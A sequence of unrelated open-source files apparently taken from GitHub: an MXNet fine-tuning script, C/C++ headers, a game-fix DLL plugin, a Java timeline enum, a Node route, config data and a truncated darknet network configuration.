String uploadSlideSubWidgetBGImage(Long relationId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<Long> getSlideExecludeRoles(Long id);
boolean postSlideVisibility(Role role, VizVisibility vizVisibility, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean copySlides(Long originDisplayId, Long displayId, User user);
}
| {
"pile_set_name": "Github"
} |
import mxnet as mx
import numpy as np
import os, time, logging, argparse, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
import gluoncv as gcv
gcv.utils.check_version('0.6.0')
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
def parse_opts():
parser = argparse.ArgumentParser(description='Transfer learning on MINC-2500 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data', type=str, default='',
help='directory for the prepared data folder')
parser.add_argument('--model', required=True, type=str,
help='name of the pretrained model from model zoo.')
parser.add_argument('-j', '--workers', dest='num_workers', default=4, type=int,
help='number of preprocessing workers')
parser.add_argument('--num-gpus', default=0, type=int,
help='number of gpus to use, 0 indicates cpu only')
parser.add_argument('--epochs', default=40, type=int,
help='number of training epochs')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.001, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float,
help='momentum')
parser.add_argument('--weight-decay', '--wd', dest='wd', default=1e-4, type=float,
help='weight decay (default: 1e-4)')
parser.add_argument('--lr-factor', default=0.75, type=float,
help='learning rate decay ratio')
parser.add_argument('--lr-steps', default='10,20,30', type=str,
help='list of learning rate decay epochs as in str')
opts = parser.parse_args()
return opts
# Preparation
opts = parse_opts()
classes = 23
model_name = opts.model
epochs = opts.epochs
lr = opts.lr
batch_size = opts.batch_size
momentum = opts.momentum
wd = opts.wd
lr_factor = opts.lr_factor
lr_steps = [int(s) for s in opts.lr_steps.split(',')] + [np.inf]
num_gpus = opts.num_gpus
num_workers = opts.num_workers
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = batch_size * max(num_gpus, 1)
logging.basicConfig(level=logging.INFO,
handlers = [logging.StreamHandler()])
train_path = os.path.join(opts.data, 'train')
val_path = os.path.join(opts.data, 'val')
test_path = os.path.join(opts.data, 'test')
jitter_param = 0.4
lighting_param = 0.1
normalize = transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(480),
transforms.RandomResizedCrop(224),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
transforms.RandomLighting(lighting_param),
transforms.ToTensor(),
normalize
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
def test(net, val_data, ctx):
metric = mx.metric.Accuracy()
for i, batch in enumerate(val_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
outputs = [net(X) for X in data]
metric.update(label, outputs)
return metric.get()
def train(train_path, val_path, test_path):
# Initialize the net with pretrained model
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
finetune_net.output = nn.Dense(classes)
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
# Define DataLoader
train_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(train_path).transform_first(transform_train),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(val_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(test_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
# Define Trainer
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
lr_counter = 0
num_batch = len(train_data)
# Start Training
for epoch in range(epochs):
if epoch == lr_steps[lr_counter]:
trainer.set_learning_rate(trainer.learning_rate*lr_factor)
lr_counter += 1
tic = time.time()
train_loss = 0
metric.reset()
for i, batch in enumerate(train_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
with ag.record():
outputs = [finetune_net(X) for X in data]
loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
for l in loss:
l.backward()
trainer.step(batch_size)
train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
metric.update(label, outputs)
_, train_acc = metric.get()
train_loss /= num_batch
_, val_acc = test(finetune_net, val_data, ctx)
logging.info('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
(epoch, train_acc, train_loss, val_acc, time.time() - tic))
_, test_acc = test(finetune_net, test_data, ctx)
logging.info('[Finished] Test-acc: %.3f' % (test_acc))
if __name__ == "__main__":
train(train_path, val_path, test_path)
| {
"pile_set_name": "Github"
} |
{
"created_at": "2015-02-27T22:27:51.555394",
"description": "Simple 1-room web chat",
"fork": false,
"full_name": "rick446/Chatterbox",
"language": "Python",
"updated_at": "2015-02-27T23:41:55.318953"
} | {
"pile_set_name": "Github"
} |
people = [{first_name = "Bruce", last_name = "Springsteen"},
{first_name = "Eric", last_name = "Clapton"},
{first_name = "Bob", last_name = "Seger"}]
| {
"pile_set_name": "Github"
} |
// TR1 cfloat -*- C++ -*-
// Copyright (C) 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 2, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this library; see the file COPYING. If not, write to the Free
// Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
// USA.
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
/** @file tr1/cfloat
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_CFLOAT
#define _TR1_CFLOAT 1
#include <cfloat>
#ifndef DECIMAL_DIG
#define DECIMAL_DIG __DECIMAL_DIG__
#endif
#ifndef FLT_EVAL_METHOD
#define FLT_EVAL_METHOD __FLT_EVAL_METHOD__
#endif
#endif
| {
"pile_set_name": "Github"
} |
/**
* This file is part of Tales of Zestiria "Fix".
*
* Tales of Zestiria "Fix" is free software : you can redistribute it
* and/or modify it under the terms of the GNU General Public License
* as published by The Free Software Foundation, either version 3 of
* the License, or (at your option) any later version.
*
* Tales of Zestiria "Fix" is distributed in the hope that it will be
* useful,
*
* But WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Tales of Zestiria "Fix".
*
* If not, see <http://www.gnu.org/licenses/>.
*
**/
#include <Windows.h>
#include "config.h"
#include "log.h"
#include "sound.h"
#include "framerate.h"
#include "general_io.h"
#include "keyboard.h"
#include "steam.h"
#include "render.h"
#include "scanner.h"
#include "command.h"
#include "hook.h"
#include <process.h>
#pragma comment (lib, "kernel32.lib")
HMODULE hDLLMod = { 0 }; // Handle to SELF
HMODULE hInjectorDLL = { 0 }; // Handle to Special K
typedef HRESULT (__stdcall *SK_UpdateSoftware_pfn)(const wchar_t* wszProduct);
typedef bool (__stdcall *SK_FetchVersionInfo_pfn)(const wchar_t* wszProduct);
std::wstring injector_dll;
typedef void (__stdcall *SKX_SetPluginName_pfn)(std::wstring name);
SKX_SetPluginName_pfn SKX_SetPluginName = nullptr;
unsigned int
WINAPI
DllThread (LPVOID user)
{
std::wstring plugin_name = L"Tales of Zestiria \"Fix\" v " + TZF_VER_STR;
dll_log = TZF_CreateLog (L"logs/tzfix.log");
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" ); // <--- I was bored ;)
dll_log->Log ( L"tzfix.dll Plug-In\n"
L"=========== (Version: v %s) "
L"===========",
TZF_VER_STR.c_str () );
DWORD speedresetcode_addr = 0x0046C0F9; //0x0046C529;
DWORD speedresetcode2_addr = 0x0056EB41; //0x0056E441; 0x217B464
DWORD speedresetcode3_addr = 0x0056E03E; //0x0056D93F;
DWORD limiter_branch_addr = 0x00990F53; //0x00990873;
DWORD aspect_addr = 0x00D52388; //0x00D52398;
DWORD fovy_addr = 0x00D5238C; //0x00D5239C;
if (! TZF_LoadConfig ()) {
config.audio.channels = 8;
config.audio.sample_hz = 48000;
config.audio.compatibility = false;
config.audio.enable_fix = true;
config.framerate.allow_fake_sleep = false;
config.framerate.yield_processor = true;
config.framerate.minimize_latency = false;
config.framerate.speedresetcode_addr = 0x0046C0F9;
config.framerate.speedresetcode2_addr = 0x0056EB41;
config.framerate.speedresetcode3_addr = 0x0056E03E;
config.framerate.limiter_branch_addr = 0x00990873;
config.framerate.disable_limiter = true;
config.framerate.auto_adjust = false;
config.framerate.target = 60;
config.framerate.battle_target = 60;
config.framerate.battle_adaptive = false;
config.framerate.cutscene_target = 30;
config.file_io.capture = false;
config.steam.allow_broadcasts = false;
config.lua.fix_priest = true;
config.render.aspect_ratio = 1.777778f;
config.render.fovy = 0.785398f;
config.render.aspect_addr = 0x00D56494;
config.render.fovy_addr = 0x00D56498;
config.render.blackbar_videos = true;
config.render.aspect_correction = true;
config.render.postproc_ratio = 1.0f;
config.render.shadow_rescale = -2;
config.render.env_shadow_rescale = 0;
config.render.clear_blackbars = true;
config.textures.remaster = true;
config.textures.dump = false;
config.textures.cache = true;
config.textures.gamepad = L"Xbox360";
config.system.injector = injector_dll;
// Save a new config if none exists
TZF_SaveConfig ();
}
config.system.injector = injector_dll;
SKX_SetPluginName =
(SKX_SetPluginName_pfn)
GetProcAddress (hInjectorDLL, "SKX_SetPluginName");
SK_GetCommandProcessor =
(SK_GetCommandProcessor_pfn)
GetProcAddress (hInjectorDLL, "SK_GetCommandProcessor");
//
// If this is NULL, the injector system isn't working right!!!
//
if (SKX_SetPluginName != nullptr)
SKX_SetPluginName (plugin_name.c_str ());
// Locate the gamestate address; having this as the first thing in the log
// file is tremendously handy in identifying which client version a user
// is running.
{
uint8_t sig [] = { 0x74, 0x42, 0xB1, 0x01, 0x38, 0x1D };
uintptr_t addr = (uintptr_t)TZF_Scan (sig, 6);
if (addr != NULL) {
game_state.base_addr = (BYTE *)(*(DWORD *)(addr + 6) - 0x13);
dll_log->Log (L"[ Sig Scan ] Scanned Gamestate Address: %06Xh", game_state.base_addr);
}
}
if (TZF_Init_MinHook () == MH_OK) {
extern void TZFix_ImGui_Init (void);
TZFix_ImGui_Init ();
CoInitializeEx (nullptr, COINIT_MULTITHREADED);
tzf::SoundFix::Init ();
tzf::FileIO::Init ();
tzf::SteamFix::Init ();
tzf::RenderFix::Init ();
tzf::FrameRateFix::Init ();
tzf::KeyboardFix::Init ();
TZF_ApplyQueuedHooks ();
// Uncomment this when spawning a thread
//CoUninitialize ();
}
SK_UpdateSoftware_pfn SK_UpdateSoftware =
(SK_UpdateSoftware_pfn)
GetProcAddress ( hInjectorDLL,
"SK_UpdateSoftware" );
SK_FetchVersionInfo_pfn SK_FetchVersionInfo =
(SK_FetchVersionInfo_pfn)
GetProcAddress ( hInjectorDLL,
"SK_FetchVersionInfo" );
if (! wcsstr (injector_dll.c_str (), L"SpecialK")) {
if ( SK_FetchVersionInfo != nullptr &&
SK_UpdateSoftware != nullptr ) {
if (SK_FetchVersionInfo (L"TZF")) {
SK_UpdateSoftware (L"TZF");
}
}
}
return 0;
}
__declspec (dllexport)
BOOL
WINAPI
SKPlugIn_Init (HMODULE hModSpecialK)
{
wchar_t wszSKFileName [ MAX_PATH + 2] = { L'\0' };
wszSKFileName [ MAX_PATH ] = L'\0';
GetModuleFileName (hModSpecialK, wszSKFileName, MAX_PATH - 1);
injector_dll = wszSKFileName;
hInjectorDLL = hModSpecialK;
#if 1
DllThread (nullptr);
#else
_beginthreadex ( nullptr, 0, DllThread, nullptr, 0x00, nullptr );
#endif
return TRUE;
}
__declspec (dllexport)
BOOL
WINAPI
SKPlugIn_Shutdown (LPVOID* lpReserved)
{
UNREFERENCED_PARAMETER (lpReserved);
if (dll_log != nullptr) {
tzf::SoundFix::Shutdown ();
tzf::FileIO::Shutdown ();
tzf::SteamFix::Shutdown ();
tzf::RenderFix::Shutdown ();
tzf::FrameRateFix::Shutdown ();
tzf::KeyboardFix::Shutdown ();
TZF_SaveConfig ();
TZF_UnInit_MinHook ();
dll_log->LogEx ( false, L"=========== (Version: v %s) "
L"===========\n",
TZF_VER_STR.c_str () );
dll_log->LogEx ( true, L"End TZFix Plug-In\n" );
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" );
dll_log->close ();
}
return TRUE;
}
BOOL
APIENTRY
DllMain (HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID /* lpReserved */)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
hDLLMod = hModule;
} break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
{
} break;
}
return TRUE;
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013-2018 yvolk (Yuri Volkov), http://yurivolkov.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.andstatus.app.timeline.meta;
import android.content.Context;
import androidx.annotation.NonNull;
import androidx.annotation.StringRes;
import org.andstatus.app.R;
import org.andstatus.app.lang.SelectableEnum;
import org.andstatus.app.net.social.ApiRoutineEnum;
import org.andstatus.app.notification.NotificationEventType;
import org.andstatus.app.timeline.ListScope;
import org.andstatus.app.util.StringUtil;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.andstatus.app.net.social.ApiRoutineEnum.ACTOR_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.DUMMY_API;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FOLLOWERS;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FRIENDS;
import static org.andstatus.app.net.social.ApiRoutineEnum.HOME_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.LIKED_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.NOTIFICATIONS_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.PRIVATE_NOTES;
import static org.andstatus.app.net.social.ApiRoutineEnum.PUBLIC_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.SEARCH_NOTES;
public enum TimelineType implements SelectableEnum {
UNKNOWN(ListScope.ORIGIN, "unknown", R.string.timeline_title_unknown, 0, DUMMY_API),
/** The Home timeline and other information (replies...). */
HOME(ListScope.USER, "home", R.string.timeline_title_home, 0, HOME_TIMELINE),
UNREAD_NOTIFICATIONS(ListScope.USER, "unread_notifications", R.string.unread_notifications, 0, NOTIFICATIONS_TIMELINE),
/** The Mentions timeline and other information (replies...). */
INTERACTIONS(ListScope.USER, "interactions", R.string.timeline_title_interactions, 0, NOTIFICATIONS_TIMELINE),
FAVORITES(ListScope.USER, "favorites", R.string.timeline_title_favorites, 0, LIKED_TIMELINE),
/** Notes by the selected Actor (where he is an Author or an Actor only (e.g. for Reblog/Retweet).
* This Actor is not necessarily one of our Accounts */
SENT(ListScope.USER, "sent", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
SENT_AT_ORIGIN(ListScope.ACTOR_AT_ORIGIN, "sent_at_origin", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
/** Latest notes of every Friend of this Actor
* (i.e of every actor, followed by this Actor).
* So this is essentially a list of "Friends". See {@link org.andstatus.app.database.table.GroupMembersTable} */
FRIENDS(ListScope.USER, "friends", R.string.friends, R.string.friends_of, GET_FRIENDS),
FOLLOWERS(ListScope.USER, "followers", R.string.followers, R.string.followers_of, GET_FOLLOWERS),
GROUP(ListScope.USER, "group", R.string.group, R.string.group_notes, DUMMY_API),
PUBLIC(ListScope.ORIGIN, "public", R.string.timeline_title_public, 0, PUBLIC_TIMELINE),
EVERYTHING(ListScope.ORIGIN, "everything", R.string.timeline_title_everything, 0, DUMMY_API),
SEARCH(ListScope.ORIGIN, "search", R.string.options_menu_search, 0, SEARCH_NOTES),
PRIVATE(ListScope.USER, "private", R.string.timeline_title_private, 0, PRIVATE_NOTES),
NOTIFICATIONS(ListScope.USER, "notifications", R.string.notifications_title, 0, NOTIFICATIONS_TIMELINE),
DRAFTS(ListScope.USER, "drafts", R.string.timeline_title_drafts, 0, DUMMY_API),
OUTBOX(ListScope.USER, "outbox", R.string.timeline_title_outbox, 0, DUMMY_API),
ACTORS(ListScope.ORIGIN, "users", R.string.user_list, 0, DUMMY_API),
CONVERSATION(ListScope.ORIGIN, "conversation", R.string.label_conversation, 0, DUMMY_API),
COMMANDS_QUEUE(ListScope.ORIGIN, "commands_queue", R.string.commands_in_a_queue, 0, DUMMY_API),
MANAGE_TIMELINES(ListScope.ORIGIN, "manages_timelines", R.string.manage_timelines, 0, DUMMY_API);
/** Code - identifier of the type */
private final String code;
@StringRes
private final int titleResId;
@StringRes
public final int titleResWithParamsId;
/** Api routine to download this timeline */
private final ApiRoutineEnum connectionApiRoutine;
public final ListScope scope;
TimelineType(ListScope scope, String code, @StringRes int resId, @StringRes int resWithParamsId,
ApiRoutineEnum connectionApiRoutine) {
this.scope = scope;
this.code = code;
this.titleResId = resId;
this.titleResWithParamsId = resWithParamsId;
this.connectionApiRoutine = connectionApiRoutine;
}
/** Returns the enum or UNKNOWN */
@NonNull
public static TimelineType load(String strCode) {
for (TimelineType value : TimelineType.values()) {
if (value.code.equals(strCode)) {
return value;
}
}
return UNKNOWN;
}
public static List<TimelineType> getDefaultMyAccountTimelineTypes() {
return defaultMyAccountTimelineTypes;
}
public static Set<TimelineType> getDefaultOriginTimelineTypes() {
return defaultOriginTimelineTypes;
}
@NonNull
public static TimelineType from(NotificationEventType event) {
switch (event) {
case OUTBOX:
return OUTBOX;
default:
return UNREAD_NOTIFICATIONS;
}
}
/** String to be used for persistence */
public String save() {
return code;
}
@Override
public String toString() {
return "timelineType:" + code;
}
@Override
public String getCode() {
return code;
}
/** Localized title for UI */
@Override
public CharSequence title(Context context) {
if (titleResId == 0 || context == null) {
return this.code;
} else {
return context.getText(titleResId);
}
}
public CharSequence title(Context context, Object ... params) {
return StringUtil.format(context, titleResWithParamsId, params);
}
public boolean isSyncable() {
return getConnectionApiRoutine() != DUMMY_API;
}
public boolean isSyncedAutomaticallyByDefault() {
switch (this) {
case PRIVATE:
case FAVORITES:
case HOME:
case UNREAD_NOTIFICATIONS:
case SENT:
return true;
default:
return false;
}
}
public boolean isCombinedRequired() {
return this != SEARCH && isSelectable();
}
public boolean isSelectable() {
switch (this) {
case COMMANDS_QUEUE:
case CONVERSATION:
case FOLLOWERS:
case FRIENDS:
case MANAGE_TIMELINES:
case UNKNOWN:
case ACTORS:
case SENT_AT_ORIGIN:
return false;
default:
return true;
}
}
private static final List<TimelineType> defaultMyAccountTimelineTypes = Stream.of(
DRAFTS,
FAVORITES,
HOME,
INTERACTIONS,
NOTIFICATIONS,
OUTBOX,
PRIVATE,
SENT,
UNREAD_NOTIFICATIONS
).collect(Collectors.toList());
private static final Set<TimelineType> defaultOriginTimelineTypes = Stream.of(
EVERYTHING,
PUBLIC
).collect(Collectors.toSet());
public boolean isAtOrigin() {
return scope == ListScope.ORIGIN || scope == ListScope.ACTOR_AT_ORIGIN;
}
public boolean isForUser() {
return scope == ListScope.USER || scope == ListScope.ACTOR_AT_ORIGIN;
}
public boolean canBeCombinedForOrigins() {
switch (this) {
case EVERYTHING:
case PUBLIC:
case SEARCH:
return true;
default:
return false;
}
}
public boolean canBeCombinedForMyAccounts() {
switch (this) {
case PRIVATE:
case DRAFTS:
case FAVORITES:
case FOLLOWERS:
case FRIENDS:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case OUTBOX:
case SENT:
case UNREAD_NOTIFICATIONS:
return true;
default:
return false;
}
}
public boolean isPersistable() {
switch (this) {
case COMMANDS_QUEUE:
case CONVERSATION:
case MANAGE_TIMELINES:
case UNKNOWN:
case ACTORS:
case SENT_AT_ORIGIN:
return false;
default:
return true;
}
}
public boolean showsActivities() {
switch (this) {
case DRAFTS:
case EVERYTHING:
case FOLLOWERS:
case FRIENDS:
case GROUP:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case OUTBOX:
case PRIVATE:
case PUBLIC:
case SEARCH:
case SENT:
case SENT_AT_ORIGIN:
case UNREAD_NOTIFICATIONS:
return true;
case FAVORITES:
default:
return false;
}
}
public boolean isSubscribedByMe() {
switch (this) {
case PRIVATE:
case FAVORITES:
case FRIENDS:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case SENT:
case UNREAD_NOTIFICATIONS:
return true;
default:
return false;
}
}
public boolean hasActorProfile() {
switch (this) {
case FAVORITES:
case FOLLOWERS:
case FRIENDS:
case SENT:
case GROUP:
return true;
default:
return false;
}
}
@Override
public int getDialogTitleResId() {
return R.string.dialog_title_select_timeline;
}
public ApiRoutineEnum getConnectionApiRoutine() {
return connectionApiRoutine;
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef ComplexGetStatus_h
#define ComplexGetStatus_h
#include "JSCJSValue.h"
#include "ObjectPropertyConditionSet.h"
#include "PropertyOffset.h"
namespace JSC {
class CodeBlock;
class StructureChain;
// This class is useful for figuring out how to inline a cached get-like access. We
// say "get-like" because this is appropriate for loading the GetterSetter object in
// a put_by_id that hits a setter. Notably, this doesn't figure out how to call
// accessors, or even whether they should be called. What it gives us, is a way of
// determining how to load the value from the requested property (identified by a
// StringImpl* uid) from an object of the given structure in the given CodeBlock,
// assuming that such an access had already been cached by Repatch (and so Repatch had
// already done a bunch of safety checks). This doesn't reexecute any checks that
// Repatch would have executed, and for prototype chain accesses, it doesn't ask the
// objects in the prototype chain whether their getOwnPropertySlot would attempt to
// intercept the access - so this really is only appropriate if you already know that
// one of the JITOperations had OK'd this for caching and that Repatch concurred.
//
// The typical use pattern is something like:
//
// ComplexGetStatus status = ComplexGetStatus::computeFor(...);
// switch (status.kind()) {
// case ComplexGetStatus::ShouldSkip:
// // Handle the case where this kind of access is possibly safe but wouldn't
// // pass the required safety checks. For example, if an IC gives us a list of
// // accesses and one of them is ShouldSkip, then we should pretend as if it
// // wasn't even there.
// break;
// case ComplexGetStatus::TakesSlowPath:
// // This kind of access is not safe to inline. Bail out of any attempst to
// // inline.
// break;
// case ComplexGetStatus::Inlineable:
// // The good stuff goes here. If it's Inlineable then the other properties of
// // the 'status' object will tell you everything you need to know about how
// // to execute the get-like operation.
// break;
// }
class ComplexGetStatus {
public:
enum Kind {
ShouldSkip,
TakesSlowPath,
Inlineable
};
ComplexGetStatus()
: m_kind(ShouldSkip)
, m_offset(invalidOffset)
{
}
static ComplexGetStatus skip()
{
return ComplexGetStatus();
}
static ComplexGetStatus takesSlowPath()
{
ComplexGetStatus result;
result.m_kind = TakesSlowPath;
return result;
}
static ComplexGetStatus computeFor(
Structure* headStructure, const ObjectPropertyConditionSet&, UniquedStringImpl* uid);
Kind kind() const { return m_kind; }
PropertyOffset offset() const { return m_offset; }
const ObjectPropertyConditionSet& conditionSet() const { return m_conditionSet; }
private:
Kind m_kind;
PropertyOffset m_offset;
ObjectPropertyConditionSet m_conditionSet;
};
} // namespace JSC
#endif // ComplexGetStatus_h
| {
"pile_set_name": "Github"
} |
/* Copyright (C) 1991, 1992, 1993, 1996, 1997, 1998, 1999, 2001, 2002, 2003,
2005, 2007, 2009, 2010 Free Software Foundation, Inc.
This file is part of the GNU C Library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _FNMATCH_H
#define _FNMATCH_H 1
#define _GL_ARG_NONNULL( x ) /**/
#ifdef __cplusplus
extern "C" {
#endif
/* We #undef these before defining them because some losing systems
(HP-UX A.08.07 for example) define these in <unistd.h>. */
#undef FNM_PATHNAME
#undef FNM_NOESCAPE
#undef FNM_PERIOD
/* Bits set in the FLAGS argument to `fnmatch'. */
#define FNM_PATHNAME (1 << 0) /* No wildcard can ever match `/'. */
#define FNM_NOESCAPE (1 << 1) /* Backslashes don't quote special chars. */
#define FNM_PERIOD (1 << 2) /* Leading `.' is matched only explicitly. */
#if !defined _POSIX_C_SOURCE || _POSIX_C_SOURCE < 2 || defined _GNU_SOURCE
# define FNM_FILE_NAME FNM_PATHNAME /* Preferred GNU name. */
# define FNM_LEADING_DIR (1 << 3) /* Ignore `/...' after a match. */
# define FNM_CASEFOLD (1 << 4) /* Compare without regard to case. */
# define FNM_EXTMATCH (1 << 5) /* Use ksh-like extended matching. */
#endif
/* Value returned by `fnmatch' if STRING does not match PATTERN. */
#define FNM_NOMATCH 1
/* This value is returned if the implementation does not support
`fnmatch'. Since this is not the case here it will never be
returned but the conformance test suites still require the symbol
to be defined. */
#ifdef _XOPEN_SOURCE
# define FNM_NOSYS (-1)
#endif
/* Match NAME against the file name pattern PATTERN,
returning zero if it matches, FNM_NOMATCH if not. */
extern int fnmatch (const char *__pattern, const char *__name,
int __flags)
_GL_ARG_NONNULL ((1, 2));
#ifdef __cplusplus
}
#endif
#endif /* fnmatch.h */
| {
"pile_set_name": "Github"
} |
module.exports = {
urls: ['/add'],
routers: {
get: function (req, res) {
var username = "username" + new Date().getTime();
var password = "password" + new Date().getTime();
var User = req.models.User;
User.create({
username: username,
password: password
}).then(function(created) {
res.send(created);
});
}
}
};
| {
"pile_set_name": "Github"
} |
[net]
# Testing
batch=1
subdivisions=1
# Training
# batch=64
# subdivisions=8
width=224
height=224
channels=3
momentum=0.9
decay=0.0005
angle=0
saturation = 1.5
exposure = 1.5
hue=.1
learning_rate=0.001
burn_in=1000
max_batches = 500200
policy=steps
steps=400000,450000
scales=.1,.1
[convolutional]
batch_normalize=1
filters=32
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=64
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=64
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
